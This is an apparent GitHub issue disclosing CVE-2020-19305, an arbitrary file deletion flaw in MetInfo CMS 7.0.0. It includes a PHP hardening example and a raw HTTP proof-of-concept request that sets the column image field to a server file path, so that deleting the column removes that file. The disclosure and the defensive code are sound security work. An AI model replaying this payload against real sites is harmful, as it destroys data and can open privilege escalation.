CVE-2020-19305: MetInfo 7.0.0 Arbitrary File Deletion · Issue #2 · MRdoulestar/CodeAnalyse

An issue in /app/system/column/admin/index.class.php of MetInfo v7.0.0 causes the file referenced by the indeximg parameter to be deleted when the column is deleted, allowing attackers to escalate privileges.


Vulnerability Name: Metinfo CMS Arbitrary File Deletion
Product Homepage: https://www.metinfo.cn/
Software link: https://u.mituo.cn/api/metinfo/download/7.0.0
Version: V7.0.0

When a column is deleted in /app/system/column/admin/index.class.php (_delolumn and fileUnlink), the file named in the column's indeximg field is also deleted, and that field can be set to an arbitrary path by a backend (admin) user through the column-image upload function.
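An added illustrative hardening, not MetInfo's own code: the unlink that runs on column deletion should only accept a stored path that resolves inside the upload directory and names an image file. The function name, the upload-directory layout and the sample files are assumptions.

```php
<?php
// Illustrative example, not MetInfo's code. The report above says the path
// stored in a column's indeximg field is unlinked when the column is deleted
// and that a backend user can store any path there. A hardened deletion
// helper refuses anything that does not resolve under the upload root.
function safe_unlink_upload(string $storedPath, string $uploadRoot): bool
{
    $root = realpath($uploadRoot);
    if ($root === false) {
        return false;
    }
    // Reject absolute paths and embedded NUL bytes before touching the FS.
    if (str_starts_with($storedPath, '/') || str_contains($storedPath, "\0")) {
        return false;
    }
    // realpath() collapses "../" and symlinks and returns false for missing
    // files, so a single prefix check covers traversal and non-existent targets.
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $storedPath);
    if ($candidate === false || !str_starts_with($candidate, $root . DIRECTORY_SEPARATOR)) {
        return false;
    }
    // Only image extensions are legitimate column pictures.
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'webp'], true)) {
        return false;
    }
    return is_file($candidate) && unlink($candidate);
}

// Constructed demonstration (assumed directory names): an image inside the
// upload root is removed; a traversal path and an absolute path that point at
// a PHP file outside the root are refused and the file survives.
$uploadRoot = sys_get_temp_dir() . '/metinfo_upload_demo';
@mkdir($uploadRoot, 0700, true);
file_put_contents($uploadRoot . '/column.png', 'png-bytes');
$outside = sys_get_temp_dir() . '/this_is_test.php';
file_put_contents($outside, '<?php // placeholder');

var_dump(safe_unlink_upload('column.png', $uploadRoot));
var_dump(safe_unlink_upload('../this_is_test.php', $uploadRoot));
var_dump(safe_unlink_upload($outside, $uploadRoot));
var_dump(file_exists($outside));
```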

POC

POST /admin/?n=column&c=index&a=doEditorsave HTTP/1.1
Host: 10.211.55.6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------172210677418114399992143883321
Content-Length: 3178
Connection: keep-alive
Referer: http://10.211.55.6/admin/
Cookie: PHPSESSID=268e9201bb4e347895ac2ac5afeb8334; Hm_lvt_520556228c0113270c0c772027905838=1578917132; Hm_lpvt_520556228c0113270c0c772027905838=1579013418; acc_auth=d9568Kwur%2Bv8GLHxl79ulL1w7lquML1KYclY%2FCd%2B9FMDQX9PAipAvJcX%2Bi5%2FFeRikywpRqDjIPMKsqnOnn9d2eQp; acc_key=RyFT5Up; arrlanguage=metinfo; re_url=http%3A%2F%2F_%2Fadmin%2F; met_auth=d751CuV3bOuwwoDzPcjuuPhQpMwDEBbdmRWy6IhPJrRO8ZfjbtwsJWPini3%2BIk0dwT9jmdCr0i4dyZ6TT0x84aIP; met_key=IMnix8E; admin_lang=cn; page_iframe_url=http://10.211.55.6/index.php?lang=cn&pageset=1

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="id"

79
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="wap_ok"

0
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="no_order"

0
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="name"

yunsle
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="text_size"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="text_color"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="nav"

0
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="new_windows"

0
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="isshow"

1
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="ctitle"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="keywords"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="description"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="filename"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="index_num"

0
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="namemark"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="indeximg"; filename=""
Content-Type: application/octet-stream

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="indeximg"

/var/www/metinfo/this_is_test.php
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="columnimg"; filename=""
Content-Type: application/octet-stream

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="columnimg"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="icon"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="other_info"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="custom_info"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="access"

0
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="display"

0
-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="nofollow"

-----------------------------172210677418114399992143883321
Content-Disposition: form-data; name="submit_type"

save
-----------------------------172210677418114399992143883321--

Then we delete the column, and the file will be deleted as well.
